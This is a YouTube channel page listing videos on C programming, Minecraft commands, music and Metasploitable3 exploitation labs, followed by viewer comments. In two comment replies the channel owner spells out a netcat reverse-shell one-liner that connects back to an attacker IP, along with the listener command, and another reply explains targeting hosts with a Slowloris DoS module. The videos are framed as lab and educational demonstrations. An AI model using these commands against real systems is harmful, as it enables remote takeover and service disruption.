K
K
  • 18
  • 32 754
Variable number of arguments in C
In this video we'll see how to use va_list, va_start, va_arg, and the va_end macros located in the stdarg.h header file...
Переглядів: 14

Відео

Average Linux User
Переглядів 1122 місяці тому
I love TMUX.
EDM fans when the worst piece of audio ever created by mankind comes on
Переглядів 1,9 тис.3 місяці тому
#edm #edmmusic #uptempo
Late Night C++ Terror
Переглядів 1743 місяці тому
Scary spaghetti, made by me.
C++ "falling" ANSI colored text in console (IDK)
Переглядів 3,4 тис.3 місяці тому
Messing around with threads.
Metasploitable3 - SQL Injection with sqlmap like a professional H̶a̶c̶k̶e̶r̶ Script Kiddie!
Переглядів 154Рік тому
Demonstration of how to use SQLMAP in order to inject the database and dump the payroll table. (Metasploitable3 VM for Ubuntu) Do not use tools like sqlmap for malicious purposes.
Metasploitable3 - UnrealIRCD 3.2.8.1 Backdoor Command Execution with Metasploit.
Переглядів 790Рік тому
This Metasploit module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010. (RAPID7)
Metasploitable3 - HTTP Parameter Key/Value SQL Injection (Drupageddon) with Metasploit.
Переглядів 172Рік тому
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. (Source: rapid7.com)
Metasploitable3 - ProFTPD mod_copy exploit with Metasploit.
Переглядів 603Рік тому
ProFTPD 'mod_copy' is a remote arbitrary file copy vulnerability. It is affected by a vulnerability in the mod_copy module which fails to honor [Limit READ] and [Limit WRITE] configurations as expected. An unauthenticated, remote attacker can exploit this, by using the mod_copy module’s functionality, in order to copy arbitrary files in the FTP directory, provided that anonymous logins and mod_...
Metasploitable3 - Slowloris DoS attack with Metasploit.
Переглядів 354Рік тому
Slowloris is an application layer DDoS attack which uses partial HTTP requests to open connections between a single computer and a targeted Web server, then keeping those connections open for as long as possible, thus overwhelming and slowing down the target. (Source: netscout.com) In this video i demonstrate how to launch this attack on a vulnerable VM (Metasploitable3 for Ubuntu) using the me...
Crashing a Windows Server 2019 VM with Hoaxshell and fork bomb.
Переглядів 58Рік тому
⚠️ Warning ⚠️ Everything shown in this video is for educational purposes only. Do not ever attempt to use a tool like this with the purpose of causing trouble to anyone else without explicit permission.
GTA San Andreas - How to break CJ's model [With Mods]
Переглядів 162Рік тому
Use any mod that can change CJ's skin and go get a tattoo or change clothes and you should get this weird glitch. Mod used in this video: Cheat Menu V3 by UNRATED69
SKULLSTEALER
Переглядів 675Рік тому
Beginner's dubstep track. Every comment is welcome (i won't be offended if you say it's wack, i'm learning!).
Minecraft 1.19 Tutorial - Generate forests in seconds using vanilla commands!
Переглядів 56Рік тому
The /place command allows the creation of crazy things! Just use your imagination. COMMANDS USED [Give yourself pigs spawn eggs with the NoAi nbt tag] /give @p pig_spawn_egg{EntityTag:{id:"minecraft:pig",NoAI:1b}} 64 [Generate features at the position of the pigs!] /execute at @e[type=pig] run place feature minecraft:trees_plains /execute at @e[type=pig] run place feature minecraft:iceberg_blue
Minecraft 1.19 Tutorial - How to place water in the Nether using vanilla commands.
Переглядів 6 тис.Рік тому
Second tutorial. Sorry for bad fps, i'm running the game through Intellij IDEA with Fabric Client. ~Commands used~ /execute in minecraft:the_nether run tp @p ~ ~ ~ (Teleports the player in the Nether at the current coordinates of the overworld) /setblock ~ ~ ~ water (Sets a water source block at the current player's position)
Minecraft 1.19 Tutorial - How to make the Warden your friend
Переглядів 18 тис.Рік тому
Minecraft 1.19 Tutorial - How to make the Warden your friend
FREE Nle Type Beat | 2021 free trap beat instrumental
Переглядів 1022 роки тому
FREE Nle Type Beat | 2021 free trap beat instrumental
Free ~ Uk Drill Type Beat
Переглядів 1242 роки тому
Free ~ Uk Drill Type Beat

КОМЕНТАРІ

  • @mokouu
    @mokouu День тому

    hypnotic

  • @Peashooter487
    @Peashooter487 8 днів тому

    dude ngl i liked your older pfp

  • @jovelancenicolobernal735
    @jovelancenicolobernal735 8 днів тому

    MAHORAGA ah moment

  • @PrincePieTheFirst
    @PrincePieTheFirst Місяць тому

    Could you do specific ones with like nametags?

  • @TiffTheVampireMonkey
    @TiffTheVampireMonkey Місяць тому

    tbh just get the Tame Warden behavior pack where you can tame a warden and he will be able to follow you fight for you and he will do other things with you since i have the pack on all my versions of minecraft lol

    • @-_-guy
      @-_-guy 13 днів тому

      can i know? where did you get this mod

  • @majorprowlgamer6311
    @majorprowlgamer6311 Місяць тому

    I wish a warden can fight them back while I was attacked by other mobs.

  • @margaritasato1365
    @margaritasato1365 Місяць тому

    @geekygymrat Try this, it's do the same thing, but shorter: #include<stdio.h> #include<time.h> int main() { char w=47,arr[] = "@#$*&+"; for(;!usleep(10<<13) | printf(" ");) for(char i=0;i^w;++i) printf("\e[0;3%dm%c ",rand()%8,arr[rand()%6]); }

  • @aaravsethi6070
    @aaravsethi6070 2 місяці тому

    Reminds me of cmatrix

  • @tonexum
    @tonexum 2 місяці тому

    Can not confirm. No struggle exiting vim

  • @steevhise
    @steevhise 2 місяці тому

    this is the funniest thing i've seen in a long long time

  • @d3vilmaster4
    @d3vilmaster4 2 місяці тому

    Hello, how did you make a victim machine with this exploit, just download the vulnerable app on it?

    • @geekygymrat
      @geekygymrat 2 місяці тому

      This is a vulnerability in the mod_copy module of proftpd 1.3.5 (CVE-2015-3306). Metasploitable3 comes shipped with this specific version of proftpd and has the mod_copy module enabled.

    • @d3vilmaster4
      @d3vilmaster4 2 місяці тому

      @@geekygymrat thank you very much

  • @kayokoswife
    @kayokoswife 2 місяці тому

    Song?

    • @geekygymrat
      @geekygymrat 2 місяці тому

      The playah & Never surrender - Hardcore door je donder (MYTH EDIT)

  • @hellx141
    @hellx141 2 місяці тому

    facts

  • @crayz12
    @crayz12 2 місяці тому

    those first kicks went hard but it just turned into shit right after

  • @ZuluZizo
    @ZuluZizo 2 місяці тому

    My PS2 copy of Vice City after it gets scratched

  • @kremlkritiker2158
    @kremlkritiker2158 2 місяці тому

    I find the music in the video very good.

  • @snowmangaming2255
    @snowmangaming2255 2 місяці тому

    finally, an EDM meme that's actually accurate also this is fire, what's the song?

    • @geekygymrat
      @geekygymrat 2 місяці тому

      The playah & Never surrender - Hardcore door je donder (MYTH EDIT)

    • @DriedJizzSock
      @DriedJizzSock 2 місяці тому

      proving the videos point entirely lmao

  • @Sinii...
    @Sinii... 2 місяці тому

    As a listener of EDM What the fuck am i listening to

  • @theDeveloperInsomniac2251
    @theDeveloperInsomniac2251 2 місяці тому

    fax tho

  • @JackPlain1633
    @JackPlain1633 3 місяці тому

    sick

  • @apatheus9092
    @apatheus9092 3 місяці тому

    so spooky!

  • @apatheus9092
    @apatheus9092 3 місяці тому

    woah!

  • @gamesdonerelativelyfast7980
    @gamesdonerelativelyfast7980 3 місяці тому

    what is the guard for? looks to me like you're slowing down your threading by using an unnecessary gaurd, you're only accessing the data to display right?

    • @Moleculor
      @Moleculor 3 місяці тому

      Yeah, first thing I see is #include <mutex> and I'm immediately wondering why that's in falling ASCII.

    • @geekygymrat
      @geekygymrat 3 місяці тому

      Just bad code overall, i regret many decisions. The mutex::try_lock() guard in display() is to avoid threads writing to the same line at the same time and mess everything up.

  • @apenaswellignton
    @apenaswellignton 3 місяці тому

    thats very cool

  • @faimenDev
    @faimenDev 3 місяці тому

    Nice cursor theme xD

  • @kojoustb9413
    @kojoustb9413 3 місяці тому

    you ddos you own how to ddos other websites shoud i rhost the websites ip then?

    • @geekygymrat
      @geekygymrat 3 місяці тому

      Exactly, RHOST stands for remote host in Metasploit, that's where you put the target address.

  • @Lord-ci1gi
    @Lord-ci1gi 5 місяців тому

    why should we switch that path ? Can you explain it please ?🙏

    • @geekygymrat
      @geekygymrat 3 місяці тому

      Sorry for the month old reply. You mean when i changed the SITEPATH option correct? It's because "/var/www/html" is usually the absolute path of the default root folder of a web server in Linux, specifically for Apache in this case.

    • @Lord-ci1gi
      @Lord-ci1gi 3 місяці тому

      @@geekygymrat what do you mean with absolute path ?

  • @NexloFreeMusic
    @NexloFreeMusic 6 місяців тому

    thank so much

  • @NateDaShark
    @NateDaShark 7 місяців тому

    Doesn't work on bedrock sadly

  • @John-rl9ue
    @John-rl9ue 7 місяців тому

    This was really helpful as I wanted Vindicators and Iron Golems to work together for fun. Thanks!

  • @user-fu6nj8lv5b
    @user-fu6nj8lv5b 7 місяців тому

    Bro could you put the "set CMD ****" in the description?

    • @geekygymrat
      @geekygymrat 7 місяців тому

      set CMD rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc lhost lport >/tmp/f Posted it here because UA-cam doesn't like angle brackets in video descriptions...

  • @hotnsexypnoy
    @hotnsexypnoy 8 місяців тому

    Me too

  • @skidatz
    @skidatz Рік тому

    Can u tell me if its possible to change cj to the spanish skeleton on nintendo switch?

  • @ajysuperfly7788
    @ajysuperfly7788 Рік тому

    /fill water works too

  • @user-tw1yt5zl5s
    @user-tw1yt5zl5s Рік тому

    hello i need some help in set cmd

    • @geekygymrat
      @geekygymrat Рік тому

      If you use the "cmd/unix/generic" payload to get a reverse shell you can do: set CMD rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {YOUR KALI IP HERE} 4444 >/tmp/f Also make sure you are listening on port 4444 with nc -lnvp 4444 Once you enter "run" you should get a connection back.

  • @gavyn7458
    @gavyn7458 Рік тому

    Does this work on PE mobile?

    • @Mani_PLAYZ311
      @Mani_PLAYZ311 9 місяців тому

      I don't think so because I tried but nothing worked.

  • @eugheniymelnikov2356
    @eugheniymelnikov2356 Рік тому

    For some reason this song sounds funny to me, its like it doesnt take itself seriously You could put spooky scary skeletons dancing and it would fit it perfectly, if you get what i mean I have never said it was bad though

  • @Jorio2702
    @Jorio2702 Рік тому

    You have a fuckton of potential, work on your craft my man!

  • @kpab
    @kpab Рік тому

    dude this is fire, though it seems that the arrangement is a bit incomplete, and also in the drops I would like to have fatter bass.

  • @MathewMusic
    @MathewMusic Рік тому

    Good start though, big up! Just needs the mixing and a little bit more on production and you'd be making bangers in no time

  • @seli12959
    @seli12959 Рік тому

    🔥🔥🔥

  • @Noxx9939
    @Noxx9939 Рік тому

    Damm it was really that easy

  • @SantiGamer585
    @SantiGamer585 Рік тому

    I just want a friendly warden following me ):

    • @Crystuliss
      @Crystuliss Місяць тому

      You can get a behavior pack on bedrock where you can tame a warden but not on java tho😭

  • @MasterUril
    @MasterUril Рік тому

    How to make only 1 friendly warden?

    • @geekygymrat
      @geekygymrat Рік тому

      You can summon a warden and make it automatically join your team /summon warden ~ ~1 ~ {Team:team_warden,PersistenceRequired:1} The problem is that when you summon wardens this way they immediately disappear in the ground. Another way would be to find the uuid of the specific warden you want to add but i dont know how to do that yet! Or just make sure you spawned 1 warden only in your world and run the /team join team_warden @e[type=warden] and don't use it again!

    • @MasterUril
      @MasterUril Рік тому

      @@geekygymrat thanks)

    • @443Cosmic
      @443Cosmic Рік тому

      @@geekygymrat oh yeah that didn’t work he just went away lmao

  • @turdpye
    @turdpye Рік тому

    this actually worked

  • @jaydenbariteau2890
    @jaydenbariteau2890 Рік тому

    Is this just for java because I'm using bedrock and /team is not a command

    • @geekygymrat
      @geekygymrat Рік тому

      Unfortunately teams are Java exclusive

  • @yuKCODM
    @yuKCODM Рік тому

    Didnt work

    • @geekygymrat
      @geekygymrat Рік тому

      Hi, are you sure you used the right commands? /team add team_name (means team_name can be whatever you want, lets call it team_warden) Once you spawn a warden in the game, you have to join it in the existing team with /team join team_warden @e[type=warden] (means every **EXISTING** warden will be added in the team) you also should make sure you are in the team as wel!! /team join team_warden @p or @e[type=player]

    • @yuKCODM
      @yuKCODM Рік тому

      @@geekygymrat when i typed it in and went to a ancient city, all the wardens attacked me ( java version btw )

    • @geekygymrat
      @geekygymrat Рік тому

      @@yuKCODM Did you place the repeating command block? Otherwise Wardens that spawn will not automatically join the team and will still try to kill you.

    • @yuKCODM
      @yuKCODM Рік тому

      @@geekygymrat i did but i'll try again and see if it works

  • @8xi_
    @8xi_ Рік тому

    thx for the tutorial <3